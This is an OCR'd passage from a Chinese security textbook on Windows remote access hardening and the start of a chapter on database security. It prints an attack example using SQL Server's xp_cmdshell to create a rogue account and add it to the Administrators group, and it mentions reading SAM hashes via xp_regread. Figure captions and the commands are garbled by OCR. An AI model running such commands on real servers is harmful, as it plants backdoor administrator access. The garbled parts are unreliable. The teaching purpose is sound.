@ 远程 终端 服务 允许 多 个 客户 端 同 时 登录 服务 器 ,不 管 是 设备 授权 还 是 用 户 授权 都 需 
要 CAL( 客 户 系统 访问 许可 证 ) 用 户 访问 授权 证 书 , 这 个 证 书 是 需要 向 微软 公司 购买 的 ; 而 
远程 桌面 管理 只 是 提供 给 操作 员 和 管理 员 一 个 图 形 化 远程 进入 服务 器 进行 管理 的 界面 (从 
界面 上 看 和 远程 终端 服务 一 样 ) “远程 桌面 是 不 需要 CAL 许可 证 书 的 。 

@@ “远程 桌面 "是 完全 免费 的 ,而 终端 服务 只 有 120 天 的 免费 使 用 期 ,超过 这 个 使 用 期 
就 需要 购买 许可 证 。 

“远程 桌面 "最 多 只 允许 两 个 管理 员 登 录 的 进程 ,而 终端 服务 没有 限制 ,只 要 购买 了 
足够 的 许可 证 ,多 少 个 用 户 同 时 登录 一 台 服务 器 都 可 以 。 

@ “远程 桌面 "只 能 容许 具有 管理 员 权 限 的 用 户 登录 ,而 终端 服务 则 没有 这 个 限制 , 什 
么 样 权 限 的 用 户 都 可 以 通过 终端 服务 远程 控制 服务 器 ,只 不 过 登录 后 权限 还 是 和 自己 的 权 
限 一 致 而 已 。 

总 之 ,了 解 了 “远程 桌面 "和 终端 服务 的 开启 方法 及 区 别 和 联系 后 用 户 就 可 以 根据 实 
际 需求 进行 选择 。 可 能 有 的 用 户 会 认为 既然 “远程 桌面 "是 免费 的 ,终端 服务 需要 购买 许 
可 证 ,都 用 “远程 桌面 ”不 就 行 了 吗 ? 实际 上 在 区 别 的 第 @ 点 中 已 经 介绍 了 ,远程 桌面 只 
能 让 管理 员 权 限 的 用 户 使 用 ,一 般 权 限 的 账户 无 法 登录 ,而 终端 访问 则 没有 这 个 限制 ; 而 
且 远程 桌面 只 能 容许 同时 2 人 登录 操作 服务 器 ,终端 访问 也 没有 这 个 限制 。 这 两 点 的 区 
别 决 定 了 当 服务 器 需要 同时 超过 2 人 ,以 及 需要 非 管 理 员 权限 的 用 户 管理 时 必须 使 用 终 
端 服务 。 


6.6 ”Windows XP 远程 控制 的 安全 机 制 


跟 其 他 远程 控制 技术 类 似 , 远 程 协助 和 远程 桌面 同样 要 在 使 用 前 考虑 好 安全 问题 。 远 
程 协助 仅 适用 于 位 于 同一 个 域 中 或 者 被 信任 的 域 中 的 两 台 计 算 机 之 间 , 并 且 通 过 设置 允许 
用 户 提 供 远程 协助 。 当 使 用 这 个 功能 时 ,专家 不 能 在 没有 声明 的 情况 下 连接 到 用 户 的 计算 
机 ,或 者 在 没有 从 用 户 处 获得 权限 的 情况 下 控制 计算 机 ,同时 用 户 也 有 人 允许 或 者 拒绝 对 方 连 
接 的 能 力 。 要 使 用 这 种 方式 进行 远程 协助 ,安全 配置 模板 的 用 户 权 限 部 分 必须 做 一 些 修改 ， 
见 表 6. 1。 

除 此 之 外 ,为 了 允许 用 户 使 用 提供 方式 的 远程 协助 ,还 需要 设置 以 下 几 个 组 策略 : 

选择 “开始 ”1“ 运 行 " 选 项 ,在 “运行 "对话 框 中 输入 gpedit. msc, 打 开 “ 组 策略 ”窗口 ,如 
图 6. 28 所 示 。 
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辆 络 与 信息 安全 基础 
表 6.1 用 户 权限 对 比 表 1 
用 户 权 限 建议 设置 
允许 通过 终端 服务 登录 
决定 哪些 用 户 或 者 用 户 组 具有 作为 终端 服务 客户 端 登录 的 能 力 ,远程 桌 面 用 户 
需要 这 个 权限 ,如 果 同 时 还 使 用 了 远程 协助 功能 ,应 只 有 使 用 该 功能 的 管理 员 | 平时 禁止 任何 用 户 拥 
具有 这 个 权限 有 此 权限 
注意 : 如 果 要 使 用 提供 方式 的 远程 协助 , 则 不 用 向 该 设置 中 添加 任何 用 户 或 者 
用 户 组 
通过 拒绝 终端 服务 登录 决定 哪些 用 户 或 者 用 户 组 被 禁止 作为 终端 服务 客户 端 | 平时 禁止 任何 用 户 拥 
登录 ,这 个 权限 是 为 远程 桌面 用 户 使 用 的 有 此 权限 


文件 到 ) ”操作 必 ) ”查看 WD 帮助 了 9) 


求 : 
至 少 出 crosoft Windows 对 
Professional 或 Windows Server 
2003 家 庶 


描述 
人 i" 
请 求 其 他 用 户 


| 十 El 
由 国 错误 报告 功能 另 一 台 计 算 机 的 用 户 
国 Windows 文件 人 
加 远程 过 程 调用 
由 国 Windows 时 间 有 
由 - 国 Internet 通信 


由 ' 国 分布 式 co 


图 6.28 组 策略 控制 台 


先 择 “计算 机 配置 "|1“ 管 理 模板 ”1“ 系 统 ”|“ 远 程 协助 ”选项 ,然后 在 右 侧 面板 中 , 右 击 “ 请 
dg dn en 6. 29 所 示 。 

在 图 6. 29 中 , 单 击 “ 已 启用 ” 单 选 按 钮 ,允许 用 户 请 求 远程 协助 ,在 “允许 远程 控制 此 计 
算 机 ”下 拉 列 表 框 中 选择 “只 允许 帮助 者 查看 此 计算 机 ”选项 ,设置 最 长 票证 时 间 ( 值 ) 为 “0”， 
以 及 最 长 票证 时 间 ( 单 位 ) 为 “分 钟 ”, 单 击 “ 确 定 ” 按 钮 , 即 可 应 用 设置 。 需 要 说 明 的 是 ,为 了 
使 用 提供 方式 的 远程 协助 .用 请 求 远程 协助 策略 是 必要 的 ; 而 设置 最 长 票证 时 间 为 “0” 可 以 


防止 用 户 使 用 请 求 远程 协助 功能 。 


在 如 图 6. 28 所 示 页 面 中 ,选择 “计算 机 配置 "1“ 管 理 模 板 ”|“ 系 统 ”|“ 远 程 协助 ” 选 


后 在 右 侧 面板 中 , 右 击 “提供 远程 协助 ”选项 ,选择 属性”, 弹 出 配置 提供 远程 协助 的 属性 对 


话 框 ,如 图 6. 30 所 示 。 
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| EE 
设置 | 说 明 | 
汉 提示 程 功 助 


支持 于 : 至 少 Microsoft Windews XP Professional 或 支持 于 : 至 少 让 erosoft Windows XP Professional 或 
上 一 设置 下 ) 下 一 设置 吕 上 一 设置 全 ) 下 一 设置 0 


职 消 Lez: | 


图 6.29 请 求 的 远程 协助 属性 对 话 框 


Ene mw | ew | 
图 6. 30 提供 远程 协助 属性 对 话 杠 


选中 “已 启用 ” 单 选 按钮 ,允许 远程 控制 这 台 计 算 机 ,在 “允许 远程 控制 此 计算 机 ”下 拉 列 
表 框 中 选择 “只 允许 帮助 者 查看 此 计算 机 ”选项 ,建议 用 户 不 要 允许 用 户 给 予 其 他 人 远程 控 
制 计算 机 的 权限 ,尽管 用 户 可 以 看 到 对 方 的 操作 以 及 随时 可 以 收回 控制 权 ,因为 要 破坏 一 
系统 只 需要 几 秒 钟 就 够 了 。 

单 击 “ 帮 助 者 "旁边 的 “显示 ”按钮 , 且 把 所 有 被 允许 对 这 台 计 算 机 提供 远程 协助 的 用 户 
全 部 添加 进来 ,例如 管理 员 以 及 桌面 帮助 人 员 等 。 建 议 限制 本 功能 仅 对 确实 需要 的 用 户 开 
放 , 具 体操 作 如 图 6. 31 所 示 , 用 户 可 以 按 以 下 的 格式 显示 : 


一 域名 二 \ 三 用 户 名 二 或 一 域名 二 \ 一 组 名 


图 6.31 添加 远程 协助 项 目 


当 “ 远 程 桌面 被 启用 后 ,3389 端口 被 打开 以 接收 终端 服务 的 访问 。 所 有 的 管理 员 ( 本 
机 的 和 域 中 的 ) 以 及 在 “远程 桌面 用 户 ” 中 被 列 出 的 用 户 和 用 户 组 都 可 以 远程 访问 该 计算 机 。 
当 连 接 被 启用 后 ,被 连接 的 计算 机 将 会 被 自动 锁定 。 如 果 目 标 计算 机 上 已 经 有 用 户 登 录 , 远 
程 的 用 户 将 会 看 到 一 个 选项 ,可 以 把 目标 计算 机 上 本 地 登录 的 用 户 注销 ,然后 从 远程 登录 上 
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去 。 但 这 需要 远程 用 户 已 经 被 成 功 验证 ,并且 需 要 具有 管理 员 权 限 .“ 远 程 桌面 ”使 用 标准 
的 Windows 验证 机 制 , 因 此 密码 策略 和 账户 锁定 策略 也 可 以 被 应 用 到 “远程 桌面 ", 所 有 用 
于 “远程 桌面 ”的 账户 都 必须 设置 密码 。 
注意 : 建议 在 使 用 远程 桌面 的 过 程 中 锁定 默认 的 Administrator 账户 并 禁止 该 账户 从 
远程 登录 ,不 过 本 地 登录 是 不 受 此 限制 的 。 

要 使 用 远程 桌面 功能 ,安全 模板 中 的 用 户 权 限 部 分 如 表 6. 2 所 示 。 


表 6.2 用 户 权限 对 比 表 2 
用 户 权 限 建议 设置 


允许 通过 终端 服务 登录 
决定 哪些 用 户 或 者 用 户 组 具有 通过 终端 服务 客户 端 登录 的 权限 ,远程 桌面 用 户 
需要 该 权限 ,如 果 同 时 使 用 了 远程 协助 功能 ,应 只 有 使 用 此 功能 的 管理 员 具 有 


Administrators、 
Remote Desktop 


Users 


该 权限 
通过 拒绝 终端 服务 登录 决定 哪些 用 户 或 者 用 户 组 没有 通过 终端 服务 客户 端 登 | 平时 禁止 任何 用 户 拥 
录 的 权限 ,该 权限 是 为 远程 桌面 用 户 准备 的 有 此 权限 


配置 终端 服务 的 策略 选项 如 表 6. 3 所 示 。 
表 6.3 终端 服务 策略 选项 


策 略 状态 
不 允许 驱动 器 重 定向 ,禁止 映射 客户 端的 驱动 器 到 终端 服务 会 话 启动 
不 将 默认 客户 端 打印 机 设置 为 会 话 中 的 默认 打印 机 ,启动 后 ,用 户 在 本 地 安装 
的 默认 打印 机 接受 那个 不 会 是 终端 服务 会 话 中 的 默认 打印 机 ,终端 服务 会 话 中 启动 


默认 的 打印 机 将 是 在 服务 器 上 制定 的 那个 打印 机 


连接 时 总 是 提示 客户 端 提供 密码 ,要 求 用 户 在 和 服务 器 建立 终端 服务 会 话 之 前 
提供 密码 ,这样 禁 用 了 保护 起 来 的 密码 

设置 客户 端 连 接 加 密级 别 

设置 终端 服务 客户 端 和 服务 器 之 间 通 信 的 加 密级 别 , 这 里 有 两 个 选择 :“ 客 户 端 
兼容 "和 "高 级 别 ”, 客 户 端 兼容 将 使 用 客户 端 支持 的 最 大 密 钥 强度 加 密 客户 端 
和 服务 器 之 间 交 流 的 数据 ; 高 级 别 将 使 用 强 128 位 加 密 来 加 密 客户 端 和 服务 器 | Enable 二 "高 级 别 " 
之 间 交 流 的 数据 。 注 意 : 要 使 用 高 级 别 的 加 密 , 用 户 的 客户 端 计算 机 必须 支持 
128 位 加 密 的 终端 服务 客户 端 软 件 ,否则 无 法 达到 该 强度 加 密 的 客户 端 将 无 法 
连接 到 服务 器 


远程 协助 和 远程 桌面 都 使 用 了 终端 服务 使 得 用 户 可 以 远程 访问 本 地 计算 机 ,在 
Windows XP 系统 中 使 用 这 些 功 能 时 ,终端 服务 使 用 了 3389 端口 。 建 议 通 过 设置 仅 允许 本 
地 局 域 网 使 用 远程 连接 功能 ,并 且 在 对 外 防火 墙 或 者 路 由 器 上 封 掉 3389 端口 。 在 该 端口 上 
所 有 的 入 站 和 出 站 连接 都 必须 被 禁止 以 阻止 非法 访问 。 如 果 仅 阻止 了 入 站 连接 ,远程 协助 
功能 还 是 有 可 能 通过 Windows Messenger 与 局 域 网 外 部 使 用 ,因此 双向 的 通信 都 要 被 
禁 自 。 

如 果 需 要 从 本 地 局 域 网 外 使 用 远程 协助 或 “远程 桌面 "连接 ,建议 在 防火 墙 或 者 路 由 器 
上 设置 过 滤 , 以 确保 只 有 特定 的 IP 地 址 可 以 访问 到 局 域 网 内 的 系统 。 所 有 其 他 地 址 到 
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3389 端口 的 访问 都 应 当 被 禁止 。 如 果 需 要 更 高 安全 级 别 的 保护 ,可 以 安装 一 个 VPN 服务 
器 ,并 使 用 非常 强 的 验证 方式 使 得 少数 用 户 可 以 拨 入 到 VPN 服务 器 。 此 外 仅 允 许 特定 的 
IP 地 址 可 以 连接 到 VPN 服务 器 也 是 个 好 方法 。 


6.7 SSL VPN 将 成 为 远程 访问 技术 的 主流 


由 于 员工 外 出 时 远程 访问 的 机 会 越 来 越 多 ,使 得 SSL VPN 的 重要 性 日 益 提 升 , SSL 
VPN 势 将 成 为 远程 访问 方案 的 主流 ; 不 过 SSL VPN 不 会 取代 现 有 的 IPSec VPN,IPSec 仍 
适用 于 办 公 室 之 间 的 固定 式 联机 ,二 者 会 彼此 共存 。 

SSL VPN 目前 主要 针对 企业 的 远程 及 出 差 的 员工 、 顾问 及 SOHO( 家 庭 办 公 ) 一 族 , 它 
可 提供 安全 的 远程 访问 服务 ,而 且 无 需 安装 或 设 定 客户 端 软 件 ,也 无 需 变更 原来 的 局 域 网 基 
础 设施 ,员工 可 利用 任何 网 页 浏览 器 ,安全 访问 企业 外 网 络 .企业 内 网 络 及 内 部 局 域 网 络 的 
资源 。 


习题 


. VPN 的 安全 管理 包括 哪 几 项 ? 

.确保 无 线 接 入 安全 性 的 安全 管理 策略 包括 哪 几 项 ? 

. 利用 RAS 的 方式 进行 远程 访问 的 缺点 是 什么 ? 

.Windows 2000 远程 控制 的 三 种 安全 解决 方法 是 什么 ? 

. 结合 第 2 章 的 内 容 ,阐述 数据 信息 加 密 技术 在 VPN 中 的 应 用 。 

.〖【 思 考题 ] 如 何 利用 现 有 的 网 络 资源 模拟 一 个 远程 接 入 的 网 络 环境 ? 


a 大 wD 
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第 7 章 数据 库 安 全 技术 


目前 数据 库 服务 器 主要 应 用 于 电子 交易 ,金融 和 企业 资源 规划 (ERP) 等 
系统 平台 。 它 还 经 常用 于 存储 来 自 商 业 伙伴 和 客户 的 敏感 信息 。 数 据 库 的 
重要 性 不 言 而 喻 。 

本 童 要 点 如 下 : 

。 数据 库 的 安全 简介 ; 

。 管理 SQL Server 的 安全 性 ; 

。 针对 SQL Server 的 攻击 和 防护 ; 

。 SQL Server 的 备份 和 还 原 。 


7.1 数据 库 安 全 简介 


尽管 数据 库 中 的 数据 完整 性 和 安全 性 非常 重要 ,但 对 数据 库 采 取 的 安全 
检查 措施 的 级 别 还 比 不 上 操作 系统 和 网 络 的 安全 检查 措施 的 级 别 。 许 多 因 
素 都 可 以 破坏 数据 的 完整 性 并 导致 非法 访问 ,这 些 因素 包括 复杂 程度 、 密 码 
安全 性 .配置 .未 公布 的 系统 后 门 以 及 自 定 义 的 数据 库 安 全 规则 等 。 


7.1.1 数据 库 的 安全 问题 
1. 保护 系统 敏感 信息 和 数字 资产 不 受 非 法 访问 


任何 公司 的 主要 电子 数字 资产 都 存储 在 现代 的 关系 型 数据 系统 中 。 商 
业 机 构 和 政府 组 织 都 是 利用 这 些 数据 库 服 务 器 得 到 人 事 信 息 , 如 员工 的 工资 
表 、 医 疗 记录 等 。 因 此 他 们 有 责任 保护 别人 的 隐私 。 某 些 数据 库 服 务 器 还 存 
有 敏感 的 金融 数据 ,包括 贸易 记录 、 商 业 合同 及 财务 数据 等 。 


2. 数据 库 是 个 极为 复杂 的 系统 ,因此 很 难 进行 正确 的 配置 和 安全 维护 


数据 库 服务 器 的 应 用 非常 复杂 。 如 Oracle、 Sybase、Microsoft SQL 
Server 等 服务 器 都 具有 以 下 特征 : 用 户 账号 及 密码 、 校 验 系统 \ 优 先 级 模型 和 
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控制 数据 库 目 标的 特别 许可 、 内 置式 命令 (存储 的 步 又 或 包 ) 唯一 的 脚本 和 编程 语言 (通常 
为 SQL 的 特殊 衍生 语 )、MiddleWare、 网 络 协 议 、 补 丁 和 服务 包 、 强 有 力 的 数据 库 管 理 实用 
程序 和 开发 工具 。 许 多 DBA(Data Base Administrator, 数 据 库 管理 员 ) 都 忙于 管理 复杂 的 
系统 ,所 以 很 可 能 没有 检查 出 严重 的 安全 隐患 和 不 当 的 配置 ,甚至 根本 没有 进行 检测 。 正 是 
由 于 传统 的 安全 体系 在 很 大 程度 上 忽略 了 数据 库 安 全 这 一 主题 ,使 得 数据 库 专业 人 员 也 通 
常 没有 把 安全 问题 当 作 他 们 的 首要 任务 。 


3. 人 们 只 注重 网 络 和 服务 器 的 防护 ,对 数据 库 服务 器 防护 不 够 


人 们 普遍 存在 着 一 个 错误 概念 : 一 旦 保护 和 修补 了 关键 的 网 络 服务 器 和 操作 系统 的 漏 
洞 , 服 务 器 上 的 所 有 应 用 程序 就 得 到 了 安全 保障 。 现 代数 据 库 系 统 具 有 多 种 特征 和 性 能 配 
置 方 式 , 在 使 用 时 可 能 会 被 误 用 ,危及 数据 的 保密 性 有效 性 和 完整 性 。 首 先 ,所 有 现代 关系 
型 数据 库 系 统 都 是 “可 从 端口 寻 址 的 ”, 这 意味 着 任何 人 只 要 有 合适 的 查询 工具 ,就 都 可 与 数 
据 库 进行 连接 ,并 能 避 开 操作 系统 的 安全 机 制 。 例 如 可 以 用 TCP/IP 协议 从 1521 端口 和 
1526 端口 访问 Oracle 7.3 和 Oracle 8.0 数据库。 而 且 大 多 数 数据 库 还 在 使 用 默认 账号 和 
空 密码 。 


4. 数据 库 安 全 防护 级 别 较 低 导致 整个 网 络 受到 攻击 


数据 库 的 安全 优先 级 别 不 高 。 即 使 运行 在 安全 状况 良好 的 操作 系统 中 ,攻击 者 也 可 通 
过 "扩展 入驻 程序 等 强 有 力 的 内 置 数据 库 特 征 ,利用 对 数据 库 的 访问 ,获取 对 本 地 操作 系统 
的 访问 权限 。 这 些 程序 可 以 发 出 管理 员 级 的 命令 ,访问 操作 系统 及 其 全 部 的 资源 。 如 果 这 
个 特定 的 数据 库 系 统 与 其 他 服务 器 有 信用 关系 ,那么 攻击 者 就 会 危及 整个 网 络 域 的 安全 。 


5. 数据 库 是 电子 商务 和 其 他 重要 商业 系统 的 基础 


电子 商务 依赖 于 网 站 后 台 的 关系 型 数据 库 。 它 们 的 安全 直接 关系 到 系统 的 有 效 性 , 数 
据 和 交易 的 完整 性 .保密 性 。 系 统 效率 欠 佳 ,不 仅 影响 商业 活动 ,还 会 影响 公司 的 信誉 。 不 
可 避免 的 ,这 些 系统 受到 攻击 的 可 能 性 更 大 。 此 外 ,ERP( 企 业 资 源 规划 ) 和 管理 信息 系统 ， 
如 ASPR/3 和 People Soft 等 ,都 是 建立 在 相同 标准 的 数据 库 系 统 中 。 无 人 管理 的 安全 漏洞 
与 时 间 拖 延 、 系 统 完整 性 问题 和 影响 客户 信任 度 有 直接 的 关系 。 


712 容易 忽略 的 数据 库 安全 


传统 的 数据 库 安全 系统 只 侧重 于 用 户 账户 和 对 特定 数据 库 目 标的 操作 许可 。 例 如 ,对 
表单 和 存储 步骤 的 访问 。 必 须 对 数据 库 系统 做 范围 更 广 的 安全 分 析 , 找 出 所 有 领域 内 可 能 
的 潜在 漏洞 。 
。 与 销售 商 提供 的 软件 相关 的 风险 : 软件 的 Bug、 缺 少 操作 系统 补丁 脆弱 的 服务 和 选 
择 不 安全 的 默认 配置 。 

。 与 管理 有 关 的 风险 : 可 用 的 但 并 未 正确 使 用 的 安全 选项 危险 的 默认 设置 ,给 用 户 
更 多 的 不 适当 的 权限 ,对 系统 配置 的 未 经 授权 的 改动 。 

。 与 用 户 活动 有 关 的 风险 : 密码 长 度 不 够 、 对 重要 数据 的 非法 访问 ,以 及 窃取 数据 库 
内 容 等 恶意 行动 。 
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以 上 各 类 危险 都 可 能 发 生 在 网 络 设备 、 操 作 系统 或 数据 库 自身 当中 。 对 数据 库 服务 器 
进行 安全 保护 时 ,都 应 将 这 些 因素 考虑 在 内 。 

在 重要 数据 库 服务 器 中 ,还 存在 着 多 种 数据 库 服务 器 的 漏洞 和 错误 配置 。 由 于 系统 管理 
员 的 账号 是 不 能 重 命名 的 (SQL 和 Sybase 是 sa, 对 于 Oracle 是 System 和 sys) ,如 果 没 有 设置 
密码 或 已 配置 完毕 ,攻击 者 就 可 以 对 数据 库 服 务 器 发 动 字典 式 登录 攻击 ,最 终 能 破解 密码 。 

因为 数据 库 密码 的 管理 在 设计 之 初 就 不 够 严格 ,例如 ,Oracle 数据 库 系 统 具 有 10 个 以 
上 的 特定 默认 用 户 账号 和 密码 。 此 外 还 有 用 于 管理 重要 数据 库 操作 的 唯一 密码 , 如 对 
Oracle 数据 库 开 机 程序 的 管理 访问 网 络 的 登录 过 程 以 及 远程 访问 数据 库 的 权限 等 。 如 果 
安全 出 现 了 问题 ,这 些 系 统 的 许多 密码 都 可 让 攻击 者 对 数据 库 进 行 完全 访问 ,这些 密码 甚至 
还 被 存储 在 操作 系统 的 普通 文本 文件 里 。 下 面 有 几 个 示例 : 

Oracle Internal 密码 (Oracle 内 部 密码 ) 存 放 在 文件 名 为 strXXX. cmd 的 文本 文件 中 ， 
XXX 是 Oracle 系统 的 ID 或 SID, 默 认 值 为 ORCL。 在 Oracle 数据 库 的 启动 过 程 中 ,要 用 
到 Oracle Internet 密码 。 这 个 文件 应 妥善 保管 。 

Oracle 监听 程序 过 程 密码 一 一 用 于 起 动 并 停止 Oracle 监听 程序 过 程 的 密码 ,监听 程序 
的 过 程 可 将 所 有 的 新 业务 路 由 到 系统 上 合适 的 Oracle 例子 中 , 需 选 择 一 个 保密 性 强 的 密码 
替换 系统 的 默认 值 , 使 用 许可 必须 在 “listener. ora” 文 件 中 得 到 保护 ,该 文件 存储 了 Oracle 
所 有 的 使 用 密码 。 对 密码 的 不 当 访 问 可 能 会 使 攻击 者 对 基于 Oracle 的 电子 商务 站 点 进行 
攻击 。 

Oracle 数据 库 系统 具有 很 多 有 用 的 特征 ,可 用 于 对 操作 系统 自 带 文 件 系统 的 直接 访 
问 。 例 如 在 合法 访问 时 ,UTL_FILE 软件 包 人 允许 用 户 向 主机 操作 系统 进行 读 写 文件 的 操 
作 。UTL_FILE_DIR 文档 变量 很 容易 配置 错误 ,或 被 故意 设置 为 允许 Oracle 用 户 用 
UTL_FILE 软件 包 在 文件 系统 的 任何 地 方 进 行 写 入 操作, 这样 对 主机 操作 系统 也 构成 了 潜 
在 的 威胁 。 

Oracle 内 部 密码 和 由 SYSDBA 授权 的 账号 密码 存储 在 Orapw 文本 文件 中 。 尽 管 文件 
已 被 加 密 ,UNIX 和 Windows NT 系统 中 ,还 是 要 限制 该 文件 的 使 用 权限 。 

操作 系统 的 后 门 (许多 数据 库 系统 的 特征 参数 ) 尽 管 方便 了 DBA, 但 也 为 数据 库 服务 器 
主机 操作 系统 留 下 了 后 门 。 

管理 员 ,系统 的 密码 和 账号 都 可 能 会 遭 到 意 想不到 的 攻击 方法 的 攻击 。 注 意 密码 管理 
问题 决 不 仅 限 于 Oracle 数据 库 , 几 乎 所 有 数据 库 提供 商 的 产品 都 有 这 种 问题 。 

对 Sybase 或 SQL 服务 器 的 sa 密码 攻击 者 有 可 能 利用 “扩展 入 驻 程 序 ”得 到 基本 操作 系统 
的 使 用 权限 ,以 sa 的 身份 登录 。 扩 展 入 驻 程 序 xp-cmdshell 允许 Sybase 或 SQL 服务 器 的 用 
户 运行 系统 指令 ,就 像 该 用 户 在 服务 器 控制 台 上 运行 指令 一 样 。 例 如 ,可 使 用 下 列 SQL 指 
令 添 加 一 个 Windows NT 账号 ,账号 名 为 hackerl ,密码 为 nopassoword, 并 把 hackerl 添加 
到 Administrators 组 。 

xp— cmdshell 'net user hackerl nopassword/aADD 


go 


xp - comdshell 'net localgroup/ADD Administrators hacker1 
go 
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现在 这 个 非法 入 侵 者 就 成 了 Windows NT 的 管理 员 。 这 个 简单 的 攻击 之 所 以 成 功 ,是 
因为 命令 被 提交 给 使 用 Windows NT 账号 的 操作 系统 ,而 MS SQL Server 的 服务 就 运行 在 
这 个 账号 下 。 在 默认 情况 下 ,这 个 账号 就 是 “Local System” 账 号 一 一 本 地 Windows NT 系 
统 中 最 有 效力 的 账号 。 攻 击 者 可 能 使 用 SQL 服务 器 ,利用 入 驻 程 序 xp-regread 从 注册 表 中 
读 出 加 密 的 Windows NT SAM 密码 ,对 操作 系统 的 安全 造成 威胁 。 从 注册 表 中 读 出 加 密 
密码 是 一 件 本 地 Windows NT 管理 员 账 号 都 无 法 做 到 的 事 。SQL 服务 器 之 所 以 能 够 做 到 ， 
是 因为 默认 方式 运行 的 SQL 服务 使 用 的 恰恰 就 是 Local System 账号 。 

关系 数据 库 系统 的 校 验 系统 可 以 记录 下 信息 和 事件 ,从 基本 情况 到 任 一 细节 ,无 一 遗 
漏 。 但 是 校 验 系统 只 在 合理 使 用 和 配置 的 前 提 下 ,才能 提供 有 用 的 安全 防范 和 警告 信息 。 
当 攻 击 者 正在 试图 侵入 特定 的 数据 库 服 务 器 时 ,这 些 特征 可 及 早 给 出 警告 信息 ,为 检测 和 弥 
补 损失 提供 了 宝贵 的 线索 。 

建议 网 络 管理 员 在 部 署 数据 库 的 时 候 , 密 切 注意 数据 库 的 安全 问题 。 及 时 了 解 系统 的 
安全 状态 和 发 展 方向 ,对 数据 库 服 务 器 的 安全 做 出 全 面 地 评估 。 


7.2 SQL 数据 库 的 安全 规划 


做 好 数据 库 的 安全 规划 ,就 如 同 打 好 大 厦 的 地 基 一 样 重要 。 因 为 很 多 数据 库 的 建设 都 
是 基于 数据 库 的 安全 策略 。 如 果 数 据 库 的 安全 策略 发 生变 化 ,数据 库 的 结构 和 内 容 有 可 能 
都 要 由 此 发 生根 本 性 的 变化 。 


72.1 SQL 数据 库 简 介 
1. 安全 模式 简介 


从 系统 结构 上 来 讲 SQL Server 有 两 种 安全 模式 。 第 一 种 是 “ 仅 Windows” 模 式 , 只 人 允 
许 拥 有 受信 任 的 Windows NT 账户 的 用 户 登录 ,是 SQL Server 默认 的 安全 模式 ,也 是 较 安 
全 的 选项 ,用 户 登 录 SQL Server 的 前 提 是 该 用 户 使 用 Windows NT 的 域 账户 登录 
Windows 操作 系统 。 

另 一 种 是 “SQL 与 Windows 用 户 身 份 验证 ”模式 ,在 SQL Server 中 建立 登录 用 户 , 所 
有 基于 Windows 操作 系统 的 用 户 只 要 使 用 这 个 SQL 账户 就 可 以 实现 SQL 登录 。 这 种 模 
式 安全 性 相对 较 差 一 些 , 容 易 被 恶意 攻击 者 使 用 暴力 破解 sa 账户 ,而 且 也 容易 遭受 注入 式 
攻击 ,但 是 管理 简单 ,目前 应 用 广泛 。 

虽然 第 一 种 模式 安全 性 高 一 些 , 但 是 什么 事情 都 是 相对 的 ,因为 使 用 Windows 身份 验 
证 时 ,所 有 的 用 户 信息 和 密码 都 存储 在 系统 目录 中 的 SAM 文件 中 ,只 要 破解 了 SAM 文件， 
就 可 以 轻松 进入 系统 。 使 用 SQL 身份 验证 时 ,所 有 的 密码 信息 也 会 以 某 种 方式 存储 在 注册 
表 和 日 志文 件 中 。 其 实 漏洞 肯定 是 存在 的 ,只 是 有 没有 被 发 现 而 已 ,应 对 这 种 无 奈 的 局 面 ， 
只 能 尽量 打 好 补丁 ,提高 警惕 ,减少 已 知 漏洞 。 


2. 登录 与 用 户 的 概念 
很 多 人 对 SQL Server 两 种 基本 安全 级 别 “ 登 录 ” 和 “用 户 ” 的 概念 了 解 不 深 ,甚至 把 它们 
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混为一谈 。 其 实 这 是 两 个 不 同 的 概念 。 

“登录 ”是 指 允 许 用 户 访问 服务 器 并 拥有 服务 器 级 别 权限 的 账户 ,属于 系统 级 别 , 权 限 的 
大 小 取决 于 系统 赋予 该 登录 账户 的 权限 级 别 ,如 sa 账户 , 它 是 sysadmin 级 别 ,那么 使 用 sa 
登录 就 可 以 取得 数据 库 系统 的 最 高 权限 。 而 用户” 属于 数据 库 级 别 , 拥 有 对 数据 库 及 其 单 
独 对 象 的 访问 权限 ,可 以 精确 到 表 , 行 .字段 等 。 

在 系统 验证 时 ,它们 之 间 的 根本 区 别 在 于 : 当 Windows 用 户 登录 数据 库 服 务 器 时 ， 
SQL Server 验证 的 是 登录 ; 当 用 户 登 和 人 数据库 系统 时 ,SQL Server 验证 的 是 用 户 。 登 录 账 
户 可 以 没有 具体 的 数据 库 对 象 访问 权限 ,但 是 具备 数据 库 访问 权限 的 用 户 必定 是 使 用 登录 
账户 登录 的 。 

另外 ,SQL Server 的 安全 性 并 不 仅仅 是 SQL Server 自身 能 解决 的 问题 ,还 需要 联合 
Windows 的 安全 性 考虑 ,互相 配合 ,才能 使 安全 性 发 挥 得 最 好 。 

为 了 减少 权限 管理 的 复杂 度 , 建 议 采 用 “ 仅 Windows” 安 全 模型 ,在 Windows NT 创建 
三 个 用 户 组 ,第 一 组 具有 SQL 管理 员 权 限 , 第 二 组 具有 读 写 数据 库 权限 ,第 三 组 只 有 查询 权 
限 , 再 把 账号 指派 给 对 应 组 ,然后 在 SQL Server 中 创建 三 个 组 ,并 指派 给 相应 的 Windows 
NT 组 。 

如 果 某 个 Windows NT 账户 指派 给 某 个 组 ,而 该 组 又 被 指派 给 SQL Server, 那 么 用 户 
必须 先 注销 系统 ,重新 以 指派 的 Windows 账户 登录 才能 获得 该 组 的 权限 。 在 Windows NT 
系统 中 采用 安全 策略 ,确保 用 户 至 少 每 个 月 更 改 一 次 密码 ,并 保证 密码 的 复杂 度 。 这 样 做 的 
好 处 是 可 以 把 SQL 用 户 管理 的 工作 合并 到 域 控制 器 中 ,减少 管理 的 成 本 ,避免 双方 可 能 存 
在 的 用 户 密码 不 一 致 的 现象 。 
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数据 库 的 安全 性 对 网 络 管理 员 来 说 是 个 永远 的 话题 ,有 时 甚至 可 以 用 牺牲 性 能 来 换取 
安全 性 。 由 于 数据 库 安全 性 不 高 造成 数据 库 遭 受 攻击 的 事情 并 不 鲜 见 ,造成 的 后 果 更 是 无 
法 预料 ,因此 作为 网 络 管理 员 和 数据 库 管理 员 ,必须 对 此 给 予 足够 的 重视 。 

下 面 深入 了 解 SQL Server 的 权限 管理 的 精髓 ,以 便 提高 并 完善 数据 库 的 安全 。SQL 
Server 的 权限 模型 不 太 好 理解 ,尤其 是 使 用 细 粒 度 的 列 级 别 权 限时 就 更 加 难以 理解 。 权 限 
安全 的 执行 操作 有 三 种 类 型 : 授予 .拒绝 撤销。 权限 安全 的 具体 类 型 如 表 7. 1 所 示 。 

表 7.1 权限 安全 的 具体 类 型 
允许 用 户 具有 访问 某 个 对 象 的 权限 
